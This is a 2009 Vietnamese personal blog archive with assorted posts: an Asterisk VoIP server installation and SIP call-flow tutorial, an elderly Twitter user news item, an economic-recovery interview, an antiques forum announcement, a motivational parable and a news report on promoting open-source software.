DAICA

Hơn 100 tuổi vẫn thích blog 'mì ăn liền'

2009-05-22T00:18:00.000-07:00

Hơn 100 tuổi vẫn thích blog 'mì ăn liền'

Nếu ai đó nghĩ rằng mạng xã hội chỉ dành cho tuổi teen thì họ sẽ ngạc nhiên khi biết thành viên già nhất trên Twitter là cụ Ivy Bean 103 tuổi. Cụ chuyển sang dùng dịch vụ tiểu blog này sau khi đã phát chán với Facebook.
>90 tuổi vẫn tư vấn sex trên mạng xã hội / Tiểu blog sẽ thành cơn sốt trong năm 2009?

Cụ Ivy Bean bên màn hình tài khoản Twitter @ivybean104. Ảnh: Telegraph.

Các thông điệp đầu tiên của cụ là "Vừa mới thưởng thức một chén trà", "Món gà hầm thật tuyệt"... "Tôi thích Twitter. Đây là mạng xã hội hoàn hảo. Bố cục mạch lạc và bắt mắt. Tôi yêu thiết kế màu xanh và trắng vì chúng hợp với bất cứ ai, nam hay nữ. Tôi thích tính năng viết tin nhắn tức thì và bạn có thể thông báo cho người khác biết chuyện gì đang diễn ra mà không phải cố sáng tác ra cái gì đó dài và đặc biệt", cụ Bean, hiện sống tại Bradford (Anh), nhận xét

Cụ chấm điểm Twitter là 5/5 trong khi MySpace chỉ được 4 vì: "Đây không phải website dành cho tôi. Ngay từ phút đầu tôi đã thấy màn hình trông rất náo nhiệt và đầy quảng cáo. Âm nhạc trên đó cũng không hợp với tôi nhưng có thể hiểu vì sao giới trẻ thích mạng xã hội này đến thế".

Facebook cũng được cụ Bean cho 4 điểm. Cụ có rất nhiều bạn bè trên đó nhưng dịch vụ này hơi rắc rối với nhiều thông tin hiển thị trên màn hình khiến cụ cảm thấy khó nắm bắt.

Châu An (theo The Sun

Cài đặt Asterisk

2009-05-21T17:58:00.000-07:00

Cài đặt Asterisk

Hướng dẫn cài đặt ASTERISK

1. Preparing for installation
Installation of Asterisk 1.4 is slightly different than installing Asterisk 1.2. There are some slight changes in the installation and some packages is needed. Asterisk GUI is available forAsterisk 1.4 only and the installation package is avalabe in Digium's svn repository. To install Asterisk GUI you need to download the CVS and the subversion package for CentOs 4.4.
Do the command:

yum install gcc gcc-c++ kernel kernel-devel bison openssl-devel libtermcap-devel ncurses-devel cvs subversion
or
apt-get install gcc gcc-c++ kernel kernel-devel bison openssl-devel libtermcap-devel ncurses-devel cvs subversion

2. Downloading Asterisk and Zaptel
Download the latest asterisk-1.4, libpri-1.4 and zaptel-1.4 source from the Digium's download site: http://downloads.digium.com
wget http://downloads.digium.com/pub/aste...-1.4.18.tar.gz

wget http://downloads.digium.com/pub/zapt...1.4.9.1.tar.gz

wget http://downloads.digium.com/pub/libp...i-1.4.3.tar.gz
Untar the Asterisk-1.4 and zaptel-1.4 source to /usr/src/
tar -zxvf zaptel-1.4.9.1.tar.gz -C /usr/src/

tar -zxvf libpri-1.4.3.tar.gz -C /usr/src/

tar -zxvf asterisk-1.4.18.tar.gz -C /usr/src/

3. Compiling and Installing
After extracting the source, you can start now the installation of Asterisk, zaptel should be install first.
You go to the zaptel-1.4.xx directory in /usr/src/zaptel-1.4.xx and do the command:
./configure

You will notice that the ./configure command was not used in installing Zaptel 1.2 and Asterisk 1.2.

Then continue the installation using the following commands.
make
make install

Libpri installation

The libpri libraries do not make use of the autoconf build environment, the installation of lipri 1.4 is same as installing libpri 1.2.

cd ..

cd libpri-1.2.3/

make

make install

Asterisk 1.4 installation

cd ..

cd asterisk-1.4.18/

./configure

make

make install

make samples

4. Getting Asterisk GUI
Alright, lets download the Asterisk GUI from Digium svn repository, to download the Asterisk GUI, go to the /usr/src/ directory and type this command:
svn checkout http://svn.digium.com/svn/asterisk-gui/trunk asterisk-gui

5. Compiling Asterisk GUI
The source of Asterisk GUI is now downloaded in /usr/src/asterisk-gui/. Lets install Asterisk GUI.
./configure

make

make install

make samples

6. Configuration
There are two files you must configure in order for Asterisk GUI to run. These files are manager.conf and http.conf located in /etc/asterisk/. Lets start at manager.conf.
[general]
displaysystemname = yes
enabled = no
webenabled = no
This is the default configuration of your manager.conf, to configure you must change the last two lines with = no with = yes.
[general]
displaylastsystemname = yes
enabled = yes
webenabled =yes
The output must be like this.
Next we will add a new user to manager.conf
[username]
secret = password
read = system,call,log,verbose,command,agent,user,config
write = system,call,log,verbose,command,agent,user,config
Lets configure the http.conf files, remember that this is the last configuration file we need to edit to be able to run the Asterisk GUI. Your http.conf should look exactly like this and you're done...
enabled=yes
enablestatic=yes
bindaddr=0.0.0.0
After that run "make checkconfig" in your asterisk-gui directory. This script will check if your GUI is correctly configured.

7. Loading ztdummy and startup scripts.
Lets load the ztdummy module and add ztdummy and Asterisk to /etc/rc.local. To load ztdummy module, type this command in the console.
modprobe zaptel
modprobe ztdummy

And to add ztdummy and Asterisk in startup scripts, edit the file /etc/rc.local and add the following line:
modprobe zaptel
modprobe ztdummy
asterisk –g

To load your Asterisk GUI, run the command "asterisk -g" in the console and point your browser to http://your-server-ip:8088/asterisk/.../cfgbasic.html

II. Technical Indepth

Asterick có thể được cấu hình với nhiều mục đích khác nhau, nhưng mô hình thông thường nhất là Client/Server. Mô hình này cho phép các client – hay còn gọi là UAC – user agent client kết nối vào server là Asterisk – hay còn gọi là UAS – User Agent Server. Các UAC là nơi sinh ra các session trong khi UAS thì xử lý thụ động các session nhận được dựa trên tập hợp rule có sẳn. Phần IV sẽ đi rỏ hơn về các dạng ứng dụng này.

Ta có thể cấu hình Asterisk trong console mode, hoặc có một cách tiện lợi hơn là edit trực tiếp các file cấu hình trong /etc/asterisk. Mổi ứng dụng riêng của Asterisk như voicemail, zaptel, music-on-hold, meetme, conference, iax … đều có configuration riêng của mình, tuy nhiên có 2 file cấu hình quan trọng nhất là sip.conf và extension.conf:

- Sip.conf : file cấu hình về các thông tin của các UAC như username, password, IP, type, security, codec, là thành phần căn bản nhất lưu giử thông tin trong Asterisk.

- Extension.conf: file cấu hình về các luật định tuyến cuộc gọi, luật quay số, các extension trong ngoài và những tính năng đặc biệt khác. Extensions.conf là file quan trọng nhất trong bất kỳ cấu hình Asterisk nào

Các file cấu hình khác

- Voicemail.conf: file cấu hình cho hệ thống voice-mail của asterisk. Asterisk có thể dùng lệnh Sendmail trên CentOS để gởi mail đến cho các địa chỉ được lưu trong file cấu hình này.

- Zaptel.conf: File này nằm ngoài /etc, là file chứa thông số index, driver dành cho Linux khi kích hoạt các thiết bị Telephony cắm trực tiếp vào Asterisk thông qua cổng PCI

- Zapata.conf: Cũng thuộc module zaptel, nhưng là file kết nối các thiết bị Telephony đã được khai báo vào hệ thống chính của Asterisk
- Iax(2).conf: Các thông số về IAX (inter-asterisk protocol) dùng khi kết nối 2 asterisk box với nhau

- MeetMe.conf: Một chức năng tạo room conference căn bản.

… và nhiều lắm!

Sau đây chúng ta thử xem qua một cấu hình căn bản với 1 server Asterisk và 2 Client dùng X-Lite (www.xten.com). Chúng ta cần làm 2 việc:

Định nghĩa trên sip.conf 2 hạng mục tương ứng với 2 client
Định nghĩa trên extension.con dial-plan và extension tương ứng.

Trên File sip.conf:

[101]
Type=friends

Username=***
Secret=***

Disallow=all
Allow=ulaw

Host=dynamic
Context=test-dialplan

[102]
Type=friends

Username=jane
Secret=jane

Disallow=all
Allow=ulaw

Context=test-dialplan
Host=dynamic

Chú ý: Trường Context trong file sip.conf phải đúng với một context – được định nghỉa bởi ký hiểu [ ] trong file extensions.conf, như thế SIP Entry đó có thể gọi được các dial-plan bên trong một context.

Trên File extensions.conf

[test-dialplan]
Exten => 101,1,Dial(SIP/101)

Exten => 102,2,Dial(SIP/102)
Config trên sẻ cho phép 2 end-point Dùng X-ten softphone, tương tự bạn có thể thêm vào nhiều ID hơn trong file SIP.conf và tạo dial-plan tương ứng với extensions.conf. Nếu Asterisk Server được đặt trên một địa chỉ IP public, và các client (softphone, phone) nằm ở địa chỉ Private, bạn phải thêm vào dòng NAT=1 trong các SIP ID được định nghỉa tại file sip.conf. Host=Dynamic cho phép các client có IP động bất kỳ, tuy nhiên chỉ áp dụng được trong trường hợp các UAC có khả năng register vào hệ thống.

Chi tiết về các thông số của sip.conf và exntesion.conf có thể được tìm thấy tại đây:

http://www.voip-info.org/wiki-Asterisk+config+sip.conf
http://www.voip-info.org/wiki-Asterisk+config+extension.conf

III. Chi tiết đằng sau một cuộc gọi SIP

Bản thân Asterisk có thể chạy nhiều protocol khác nhau như H323, Skinny (SCCP) và MGCP … nhưng khi nhắc đến *, người ta nghỉ ngay đến SIP. Ngoài Asterisk, cấu trúc rất linh động của SIP cũng là engine cho rất nhiều ứng dụng khác nhau: Instant Messaging (MSN, Jabber), Online Game, Session Control, WholeSale VoIP và các ứng dụng tùy biến khác vốn đòi hỏi sự kết nối linh hoạt giửa các bên tham gia.

Bây giờ chúng ta sẽ phân tích cấu hình tại phần II,

Tuần tự các bước diển ra như sau:

1. Máy tính *** vừa bootup, chương trình Xten tự động kích hoạt kết nối vào Asterisk (vì Xten đã được cấu hình sẳn). Xten sẽ gởi 1 SIP Message Method REGISTER vào Asterisk với SIP ID là ***@1.1.1.1 và location là 1.1.1.1
2. Asterisk sẽ gởi lại cho *** 403 Unauthorized Message, thực chất là một dạng Challenge Message.
3. ***’s Xten khi nhận được Message 403 sẽ tiến hành MD5 hash cái secret mà *** đã cấu hình trong Xten, sau đó nó gởi một SIP REGISTER MESSAGE với một header đặc biệt: www_authorization hoặc proxy_authorization (tùy loại UA, trong trường hợp này là www_authorization), trong đó chứa giá trị Hash mà nó mới có được. Asterisk khi nhận REGISTER message thứ nhì của ***, kiểm tra và thấy có header www_authorization có giá trị hash. Asterisk sẽ check trong bộ nhớ của mình xem SIP ID là *** có secret không, nếu có, nó sẽ hash cái secret trong bộ nhớ và so sánh với hash string được gởi từ *** lên. Nếu giống nhau, thì tiếp tục sang bước 5, còn fail thì lập lại bước 2. Khi Asterisk start, nó sẽ lấy đọc thông số trong các File .conf một lần duy nhất, do đó khi thay đổi trong các file config của Asterisk, phải restart asterisk bằng cách kết nối vào Asterisk CLI và dùng lệnh “reload”.
Khi hash-check pass, Asterisk gởi về cho *** một SIP MESSAGE 200 OK (giống http) báo rằng anh đã registered. Đồng thời nó cũng cập nhật location-table của mình là : ***@1.1.1.1
4. Khi *** tiến hành gọi Jane (với SIP, người ta có thể gọi bằng số, hoặc bằng tên cũng được), Xten của *** sẽ gởi một INVITE MESSAGE vào Asterisk. Asterisk sẽ look up trong Location Table của mình và tìm thấy Jane tại địa chỉ 2.2.2.2 (bước 5.5), trong trường hợp tìm không thấy, Asterisk có thể gởi về cho *** một SIP MESSAGE 404 NOT FOUND (quen quá T_T)
5. Asterisk forward SIP INVITE MESSAGE đến Jane@2.2.2.2 , tất nhiên cũng đã add vào trong INVITE đấy địa chỉ của mình. *
6. Đồng thời, Asterisk cũng gởi về cho *** một SIP MESSAGE 180 RINGBACK, báo hiệu là phone của Jane@2.2.2.2 đã reng, chờ đợi bắt máy.
Jane bắt máy, và gởi về cho Asterisk một SIP MESSAGE 200 OK với đầy đủ thông số Voice của phone của Jane như Codec, Timing .v.v. nằm trong SIP Body (Session Description Protocol – SDP)
7. Asterisk chuyển Message 200 OK về cho ***, và hoàn tất quá trình kiểm soát tín hiệu SIP giữa 2 UAC. Đồng thời cập nhật các thông tin về Billing nếu có cấu hình.

Lúc này, ***@1.1.1.1 và Jane@2.2.2.2 mở một RTP session trực tiếp đến nhau hoặc thông qua Asterisk tùy thuộc vào NAT setting giửa 2 người. SIP nằm ở thượng tầng của Transport Layer, dùng UDP 5060, trong khi RTP thường dùng các private port > 1024. Do SIP và RTP cùng chạy trên một ứng dụng nhưng lại khác port, nên đôi khi chúng ta gặp tình huống UAC sẽ reng nhưng RTP bị block, giới chuyên môn gọi là One-Way-Audio.
* ở giửa các bước thật ra còn có một dạng Message ACK nhỏ, tuy nhiên để đơn giản hóa, người viết lược bỏ phần này. Chi tiết về SIP có thể được tìm thấy rất nhiều trên Internet, tuy nhiên để hiểu sâu, kỷ và chính xác, RFC là 1 bắt buộc.

SIP RFC: http://www.faqs.org/rfcs/rfc3261.html

IV. Các ứng dụng của Asterisk
Asterisk hổ trợ rất nhiều công nghệ khác nhau như H323, SIP, MCGP, SCCP cũng như nhiều loại giao tiếp mạng khác nhau như FXO, FXS, ISDN PRI, ISDN BRI, E3 thậm chí SS7. Bản thân cấu trúc nguồn mở cùng giao thức SIP linh hoạt, cho phép developer lẩn người sử dụng có thể customize ứng dụng Asterisk của mình đáng kể. Đặc biệt, phải kể đến giao tiếp Asterisk AGI và AsteriskRealtime cho phép Asterisk kết hợp với các ngôn ngử lập trình thông dụng như C, C++, VBB, PHP, Shell-script, Python cùng với hệ cơ sở dử liệu MySQL hoặc Oracle để phát triển những ứng dụng Voice-Application khác nhau. Sau đây người viết xin giới thiệu một vài hệ thống mà đã có kinh nghiệm làm qua:

1. SIP Registrar / IP PBX: Ứng dụng căn bản nhất của Asterisk, nhưng cũng là mạnh nhất. Asterisk được cấu hình làm SIP proxy chính cho các Client kết nối vào. Có thể tích hợp AsteriskRealTime và một WEB GUI để tiện cho việc quản lý (tự viết hoặc dùng có sẳn). SIP Registrar có sẳn các tính năng hấp dẩn như voicemail, IVR, call-transfer, conference .v.v.
2. Conference Hub: Tận dụng chức năng của Asterisk và biến nó trở thành một Conference Hub. Asterisk được dedicate sử dụng resource của phần cứng để mirror các dòng RTP khác nhau từ nhiều client gọi đến. Thông thường trong trường hợp này, Asterisk được sử dụng chung với một hệ thống Softswitch khác – Asterisk trở thành UAC của hệ thống đó
3. Application Call Center: Tính năng IVR (interactive voice respond) của Asterisk có thể được customize thành nhiều lớp khác nhau (không có giới hạn), cho phép tạo ra một danh mục trả lời tự động khổng lồ. Ứng dụng này được dùng nhiều nhất trong các trung tâm hổ trợ khách hàng có trả lời tự động, tiết kiệm được rất nhiều thời gian và chi phí. Chúng ta cũng có thể tạo ra một chương trình tương tác DATA/PHONE khi dùng với Asterisk AGI và một ngôn ngử lập trình khác.

4. Class 5 Features box: Asterisk được sử dụng như một thiết bị cung cấp dịch vụ cộng thêm cho các softswitch khác. Rất nhiều SIP proxy (nhất là của Telco) có cấu trúc khá đơn giản và gọn nhằm tăng tốc độ xử lý, do đó thường thiếu những tính năng như voicemail, calling-card .v.v.. Asterisk lắp vào chổ trống đó một cách hoàn hảo, và được rất nhiều các start-up VoIP provider sử dụng
5. Codec Transformer: Dân VoIP chuyên nghiệp hẳn sẽ rất đau đầu với các hệ thống Codec khác nhau của voice, đặc biệt khi kết nối đến 1 nhà cung cấp khác. Thương thì ít ai chịu thay đổi Codec mặc định của mình, nếu nói là không thể. Có nhiều giải pháp work-around như back-to-back TDM trên các Media Gateway. Asterisk có thể làm IP-to-IP codec transformation một cách hoàn hảo, đặc biệt với license của g729a.

6. Media (PSTN/ISDN/E3) Gateway: Bản thân Asterisk sử dụng chung với các module Zaptel ISDB PRI , FXO, FXS cho phép Asterisk gởi cuộc gọi ra ngoài các hệ thống mạng điện thoại công cộng hay ISDN, đây cũng là một giải pháp giá rẻ.

V Đoạn kết
Tác giả không có tham vọng thuyết phục bạn vứt bỏ hệ thống VoIP của mình hiện tại, mà chỉ khuyến khích bạn download vài cài đặt Asterisk, biết đâu bạn sẽ cảm thấy có những tính năng hay trên Asterisk có thể tích hợp hoàn toàn thoải mái vào hệ thệ thống Integrate Phone Computer của bạn. Đồng thời, tác giả cũng khuyến khích các nhóm, các công ty lập trình nhìn thấy được tiềm năng của Asterisk tiến hành nghiên cứu, phát triển nó, vì đó có thể là con đường khả thi cho chúng ta cơ hôi bắt kịp được trình độ công nghệ VoIP của thế giới.

url:http://blog.360.yahoo.com/blog-2C3IARUidKifywL4pA7k?p=34

'Tôi giữ cách nhìn thận trọng về phục hồi kinh tế'

2009-04-20T20:55:00.001-07:00

Chuyên gia kinh tế cao cấp Bùi Kiến Thành cho rằng cần thêm dữ liệu để nhận định về sức khỏe nền kinh tế, và không nên sớm lạc quan khi thấy những biểu hiện nhất thời trên thị trường chứng khoán hay lỗ lãi của ngân hàng.
> Vượt qua khủng hoảng từ những 'gánh hàng rong' / Việt Nam xuất hàng chục tấn vàng

Chuyên gia tài chính Bùi Kiến Thành. Ảnh: Ngọc Châu

- Một số ý kiến gần đây cho rằng nền kinh tế đã xuất hiện tín hiệu hồi phục. Theo ông, dấu hiệu của hồi phục kinh tế sẽ thể hiện trước hết ở đâu?

- Người ta nhìn vào các chỉ báo chính để biết rằng sức khỏe của nền kinh tế đang ở mức nào. Một trong số đó là chỉ số niềm tin kinh doanh (BCI), trong quý I/2009 chỉ số này tại Việt Nam tăng 6 điểm so với quý cuối năm 2008, cho thấy đa số nhà quản lý doanh nghiệp vẫn tin vào gia tăng doanh thu và lợi nhuận trong vòng 12 tháng tới. Tiêu dùng nói chung giảm, nhưng tiêu dùng cá thể trong nước vẫn tăng khá.

Tuy vậy, các chỉ số kinh tế vĩ mô khác chưa thực sự lạc quan. Xuất khẩu trong tháng 3 tăng 2,4% so với cùng kỳ năm trước, nhưng nhìn vào chi tiết thì thấy là không tăng, mà vẫn đang giảm. Các sản phẩm chiến lược của Việt Nam như dệt may, gỗ, giày dép giảm mạnh, hoặc không tăng. Riêng xuất khẩu đá quý và kim loại có giá trị xuất khẩu bằng gần 5.000% cùng kỳ năm trước. Đúng là Việt Nam xuất siêu, nhưng tái xuất vàng thì không phải là một hoạt động kinh tế đơn thuần. Nhập khẩu giảm xuống, nhưng đáng chú ý là hàng xuất khẩu của Việt Nam có 70-80% nguyên liệu ngoại nhập. Xuất khẩu giảm nên nhập khẩu cũng giảm theo.

Tôi cho rằng cần thận trọng khi nhận định kinh tế đã ra khỏi khủng hoảng hay chưa, và phải nhìn vào các chỉ số, đặc biệt là dữ liệu về sản xuất của các doanh nghiệp.

- Ông nghĩ sao về khả năng hồi phục của kinh tế Mỹ và Trung Quốc sẽ có tác động lan tỏa tới Việt Nam, nhất là khi Mỹ là thị trường xuất khẩu lớn nhất của Việt Nam ?

- Chủ tịch FED Ben Bernanke có nói rằng kinh tế Mỹ có khả năng khởi sắc vào cuối năm 2009, nhưng vế thứ hai của nhận định này là "nếu có thể giải quyết tình trạng đóng băng của hệ thống tài chính Mỹ và thế giới".

Khủng hoảng tại Mỹ bắt nguồn từ việc trái phiếu phái sinh được đảm bảo bởi các hợp đồng cho vay bất động sản (mortgage-backed securities) bị mất thanh khoản và trở nên "nhiễm độc", như cách nói của cựu Bộ trưởng Tài chính Henry Paulson. Tổng giá trị hợp đồng cho vay bất động sản tại Mỹ lên đến 12.000 tỷ USD. Để bảo hiểm nguy cơ xảy ra nợ xấu, các nhà đầu tư các sản phẩm phái sinh này mua hợp đồng Bảo đảm nợ xấu (Credit Default Swap - CDS). Đến cuối tháng 6/2008, tổng giá trị hợp đồng CDS bên Mỹ là 35.000 tỷ USD, trong khi GDP Mỹ là 14.700 tỷ. Thị trường CDS đem lại lợi nhuận khổng lồ nhưng đã khiến thị trường tín dụng sụp đổ khi các hợp đồng vay biến thành nợ xấu. Đến tháng 10/2008, các định chế tài chính hàng đầu thế giới lâm vào tình trạng phá sản, mọi lĩnh vực kinh tế đều không tiếp cận được vốn vay. Đến nay các chính phủ đã bơm tiền để khuyến khích ngân hàng cho vay, song thị trường vẫn đóng băng.

Chính phủ Mỹ dự định mua lại các khoản nợ xấu bằng gói tài chính 700 tỷ USD, nhưng nay họ không làm nữa. Giá trị các trái phiếu này tại thị trường Mỹ trước đây được xác định khoảng 4.000-5.000 tỷ USD, đến nay Mỹ chưa có giải pháp nào. Khoảng 2.000 tỷ USD trái phiếu do Chính phủ Mỹ phát hành cũng sẽ khó bán, nên FED sẽ phải mua vào, thực chất là in thêm tiền. Việc này lại tạo thêm những hệ lụy. Nhìn chung, các chỉ báo kinh tế tại Mỹ, châu Âu và Nhật vẫn đang đi xuống.

Trung Quốc có lợi thế ở thị trường nội địa rộng lớn và lệ thuộc ít hơn vào thị trường nước ngoài. Họ đang chuyển hướng về nông thôn, và nếu chừng đó nông dân của Trung Quốc ăn nên làm ra, thì sẽ rất thuận lợi cho nền kinh tế của họ. Song ta cần quan sát thêm cách làm của Trung Quốc.

- Nhưng thị trường tài chính Mỹ đã có dấu hiệu tích cực, một số ngân hàng như Citigroup và Wells Fargo báo cáo lãi trong 3 tháng đầu năm nay?

Chuyên gia tài chính Bùi Kiến Thành (sinh năm 1932) hiện là nhà tư vấn chiến lược kinh tế cho Chính phủ. Ông từng là cố vấn cao cấp của nhiều tập đoàn đa quốc gia như AIG, KHM… Là một trong 19 cá nhân nhận giải thưởng "Vinh danh nước Việt" lần đầu tiên năm 2004.

- Việc những ngân hàng Mỹ báo lãi chỉ là câu chuyện kế toán thôi. Citi nhận 45 tỷ USD hỗ trợ của Chính phủ Mỹ và được bảo đảm cho hơn 300 tỷ USD nợ khó đòi. Năm 2008 họ ghi sổ lỗ trên 20 tỷ USD. Các tài sản nhiễm độc được "khóa sổ" và không tính lại theo giá trị thị trường. Sang quý mới, họ báo lãi, là lãi trong riêng thời điểm này, do được Chính phủ bơm vốn và chưa tính tới số lỗ ghi trong sổ.

- Ông nói gì về con số trên 220.000 tỷ đồng vốn bù lãi suất 4% mà các ngân hàng trong nước báo cáo đã giải ngân trong vòng 2 tháng qua?

- Con số 220.000 tỷ đồng vốn cho vay đã giải ngân sẽ tương đương 17-18% dư nợ của hệ thống ngân hàng. Nhưng số liệu của Ngân hàng Nhà nước cho thấy tổng dư nợ chỉ tăng thêm hơn 2%. Tôi cho rằng, vấn đề tiền giải ngân đi đâu và đảo nợ cần được quan tâm.

Đặt giả thiết có chuyện đảo nợ, trong trường hợp đó, ngân hàng vẫn được bù 4% lãi suất, mà lại "làm sạch" được nợ khó đòi trong báo cáo tài chính. Còn doanh nghiệp vay vốn và báo cáo là đưa vào vốn lưu động 8 tháng. Mà việc sử dụng vốn lưu động có đúng mục đích hay không thì kiểm soát không dễ.

Với các nền kinh tế, lãi suất tái cấp vốn và chiết khấu là những công cụ quan trọng để điều hành lãi suất cho vay trên thị trường. Khi ngân hàng trung ương các nước cung ứng vốn cho ngân hàng thương mại với lãi suất 1-2%, ngân hàng thương mại có thể cho vay với lãi suất 4-5% mỗi năm, mà không cần tới tiền hỗ trợ từ ngân sách để bù lãi suất.

Nếu đảo nợ có thật, mọi chuyện sẽ càng nguy hiểm hơn nếu những đồng vốn đó được chuyển hóa thành đôla để trả nợ cho các hợp đồng nhập khẩu trước đây. Theo chương trình của Chính phủ, doanh nghiệp chỉ được hỗ trợ lãi suất khi vay vốn bằng tiền đồng, cho sản xuất kinh doanh và đầu tư mới. Thị trường ngoại hối gần đây nóng lên, trong bối cảnh nhu cầu nhập khẩu không lớn, cũng là câu hỏi cần có lời giải đáp.

- Diễn biến thị trường chứng khoán sôi nổi trong những ngày gần đây được cho vừa là tín hiệu của hồi phục kinh tế, vừa là kỳ vọng của giới đầu tư về khả năng này. Ông nghĩ sao về dòng tiền đang chảy vào thị trường chứng khoán?

- Tôi cho rằng cần kiểm tra dòng tiền này. Chưa thể loại trừ khả năng nguồn vốn từ các ngân hàng đã chuyển sang chứng khoán. Chỉ khoảng 5% nguồn vốn này chảy sang chứng khoán, cũng đã là đủ để "tung hoành".

Thực tế, dù có những phiên tăng điểm, nhưng không có cơ sở kinh tế vĩ mô cho chiều hướng đứng vững và không quay đầu trở xuống. Ngoài ra chứng khoán Mỹ vẫn trong xu thế đi xuống. Chứng khoán trên thị trường Mỹ đã mất 40-50% giá trị, và khi các ngân hàng báo cáo lãi thì mới có những ngày đi lên. Quan trọng là xem căn bản thị trường có những chỉ báo gì.

Ngọc Châu - Song Linh

Diễn đàn Cổ Vật Tinh Hoa

2009-04-16T21:13:00.001-07:00

Xin chân trọng được mời tất cả các bạn tham gia diễn đàn Cổ Vật Tinh Hoa.

Diễn đàn là nơi giao lưu, trao đổi về của vật của những người yêu thích cổ ngọan trong và ngoài nước.

Có thể nói rằng đây là diễn đàn chính thức đầu tiên về cổ vật được ra mắt ở Việt Nam, diễn đàn được manh nhúm từ năm 2007, tuy nhiên do 1 số yếu tố, đến năm 2009, diễn đàn mới chính thức được ra mắt.

Tham vọng của diễn đàn là sẽ tạo lập được 1 bức tranh toàn cảnh về cổ vật ở Việt nam ( chủ yếu bao gồm cổ vật của Trung Quốc và Việt nam), từ đó sẽ có thể hình thành được các bộ sưu tập phong phú về chủng loại cũng như đa dạng về văn hóa.

Với mục đích là nơi giao lưu về cổ vật, nên các chức năng của diễn đàn được thiểt kế dành riêng cho vấn đề quản lý cổ vật để các thành viên có thể dễ ràng quản lý bộ sưu tập của mình cũng như giới thiệu, quảng bá bộ sưu tập

Diễn đàn Cổ Vật Tinh hoa được phân thành các chuyên mục theo chủng loại của cổ vật như Đồ gốm sứ, đồ đá quý, đồ đông-bạc -vàng, đồ gốm việt, đồ gỗ, đồ thủy tinh-pha lê, đồ gỗ, tiền cổ, đồ phỏng cổ.

Địa chỉ của diễn đàn:

http://www.covattinhhoa.vn/diendan

Xin giới thiệu một số ảnh của cổ vật tiêu biểu trên diễn đàn Cổ Vật Tinh Hoa

hòn đá cuội

2009-04-16T21:09:00.000-07:00

Trong một buổi nói chuyện với một nhóm các doanh nhân, một chuyên gia trình bày về cách sử dụng thời gian có hiệu quả. Đứng trước những người khá thành đạt trong cuộc sống, ông mỉm cười: “Sau đây là một câu hỏi trắc nghiệm”. Ông ta lấy từ gầm bàn một cái lọ rộng miệng cỡ 4 lít và một cái túi chứa những hòn đá cuội to bằng nắm tay. Ông lần lượt đặt từng hòn đá vào lọ cho đến khi không bỏ vào được nữa. “Cái lọ đã đầy chưa?” – ông hỏi.

“Đầy rồi” - mọi người đáp. “Thật không?” – ông lấy từ gầm bàn ra một túi sỏi nhỏ đổ từ từ vào lọ và lắc cho các hòn sỏi chen vào tất cả các khoảng trống giữa các hòn đá cuội. Ông nhoẻn miệng cười và hỏi: “Cái lọ đầy chưa?”

Lần này thì mọi người dường như bắt kịp ông. Ai đó trả lời: “Chắc là chưa”.

“Tốt!” – ông nói và lấy ra một túi cát đổ vào lọ và cát chen đầy vào các khoảng trống giữa những hòn đá cuội và hòn sỏi. Một lần nữa, ông hỏi: “Cái lọ đầy chưa?”

“Chưa” - mọi người nhao nhao. “Tốt” – ông lập lại và vớ lấy bình nước đổ vào lọ cho đến khi nước ngập đến miệng lọ. Ông ngước nhìn mọi người và hỏi: “Minh họa này nói lên điều gì?”.

Một nhà kinh doanh nhanh nhẩu đáp: “Vấn đề là cho dù kế hoạch làm việc của bạn có sít sao thế nào đi nữa, nếu cố gắng bạn luôn có thể làm thêm nhiều việc nữa!”

“Không phải” – ông đáp – “Đó không phải là vấn đề. Điều mà minh họa vừa rồi nói lên là nếu bạn không đặt những hòn đá cuội vào lọ trước, bạn sẽ không bao giờ còn có thể nhét chúng vào được nữa”.

Cái gì là những “hòn đá cuội” trong cuộc sống của bạn? Có thể là một dự án, một hoài bão mà bạn muốn thực hiện, thời gian với những người mà bạn thương yêu, học vấn của bạn, sức khỏe của bạn.. Nhưng nhớ đặt những “hòn đá cuội” đó vào lọ trước hoặc bạn sẽ không bao giờ nhét chúng vào được. Chúng ta luôn cố gắng làm thật nhiều việc trong khoảng thời gian giới hạn của mình. Nhưng điều quan trọng là những việc mà bạn đang làm có thật sự có ý nghĩa?

Thế thì tối nay hay sáng mai khi bạn suy ngẫm về câu chuyện này, hãy tự hỏi chính bản thân mình rằng điều gì là những “hòn đá cuội” trong cuộc sống của chính bạn và hãy đặt chúng vào trong lọ trước.

Hạn chế vi phạm bản quyền bằng việc sử dụng các phần mềm tự do nguồn mở

2009-01-05T22:24:00.001-08:00

Hạn chế vi phạm bản quyền bằng việc sử dụng các phần mềm tự do nguồn mở

Cập nhật lúc 16h05" , ngày 03/01/2009 -

Mọi bộ, ngành, doanh nghiệp, tổ chức Việt Nam sẽ cùng chung tay đẩy mạnh sử dụng phần mềm nguồn mở.

(VnMedia) - Đây là nội dung quan trọng được nêu tại Chỉ thị về đẩy mạnh sử dụng phần mềm mã nguồn mở trong hoạt động của cơ quan, tổ chức nhà nước do Bộ trưởng Bộ Thông tin và Truyền thông Lê Doãn Hợp vừa ký ban hành ngày 30/12/2008.

Chỉ thị được ban hành nhằm đẩy mạnh sử dụng các phần mềm tự do nguồn mở (hay còn gọi là phần mềm mã nguồn mở- viết tắt là PMNM), góp phần hạn chế vi phạm bản quyền phần mềm.

Theo chỉ thị này, các đơn vị chuyên trách về công nghệ thông tin (CNTT) của các Bộ, cơ quan ngang Bộ, cơ quan thuộc Chính phủ và các Sở Thông tin và Truyền thông (Sở TT&TT) của các tỉnh, thành phố trực thuộc Trung ương sẽ phải thực hiện một số nhiệm vụ trọng tâm cụ thể như: Chậm nhất đến ngày 30/6/2009, đảm bảo 100% máy trạm của đơn vị chuyên trách về CNTT và Sở TT&TT được cài đặt, 100% cán bộ, nhân viên được tập huấn, hướng dẫn sử dụng, trong đó tối thiểu 50% cán bộ, nhân viên có thể sử dụng thành thạo trong công việc và có khả năng hướng dẫn trợ giúp các cơ quan, đơn vị khác thuộc Bộ, ngành, tỉnh, thành phố; Chậm nhất đến ngày 31/12/2009, đảm bảo 70% máy trạm trong các cơ quan, đơn vị thuộc Bộ, ngành, tỉnh, thành phố được cài đặt, 70% cán bộ, nhân viên được tập huân, hướng dẫn sử dụng, trong đó tối thiểu 40% cán bộ, nhân viên sử dụng các phần mềm nêu trên trong công việc.

